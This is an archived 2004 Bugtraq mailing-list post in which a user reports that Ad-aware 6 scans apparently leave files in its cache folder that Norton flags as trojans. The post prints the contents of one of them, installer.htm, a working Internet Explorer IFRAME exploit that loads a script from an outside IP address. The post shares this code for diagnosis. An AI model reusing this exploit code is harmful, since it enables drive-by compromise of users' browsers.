lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <LIEKJLEBDKKNBDDGIJAAAEBECFAA.fedhead@rogers.com>
Date: Sun, 20 Jun 2004 10:36:16 -0400
From: "fedhead" <fedhead@...ers.com>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Unusual Activity in Ad-aware 6 Personal, Build 6.181


Sorry about my previous post, Norton picked up the html code an filtered my
e-mail. Here is the original post without the html flags

Hello,

My apologise if I am posting in the wrong list but I am not sure if this is
a known issue in Ad-aware or if this even is an issue with Ad-aware.

I have written a script to run ad-aware to scan the registry and files from
Windows XP Scheduled tasks:

rem Scan the local registry
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" +c +1 +A

rem Scan the file system:
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" C:\ +a +1 +A

Seems benign enough. Every night when it runs, after the first scan of the
registry, it creates four files in the C:\Program Files\Lavasoft\Ad-Aware
6\cache folder which Norton AV catches as trojan scripts:

exploit.chm
installer.htm
shellscript.js
shellscript_loader.js

In installer.htm, it appears to use one of the IE IFRAME exploits to
download the java script files.

cat installer.htm

<script language="Javascript">

    function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://62.131.86.111/security/idiots/repro/shellscript_loader.js\\'><
\/script>'";
    }

</script>

<script language="javascript">


setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
    setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
    document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp"
WIDTH=200 HEIGHT=200></IFRAME>');

</script>


The most unusual part is that it happens at the end of the registry scan in
Ad-aware. A google search doesn't turn up any relation between this exploit
and Ad-aware so it could be something unique to my system but at this point
I am at a loss as to what it could be.

I also have an 'image' of my Windows XP Pro install in a VMware where I have
been testing SP2 and the files also exist there as well.

Any info would be appreciated.

Thanks,
Matt







Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ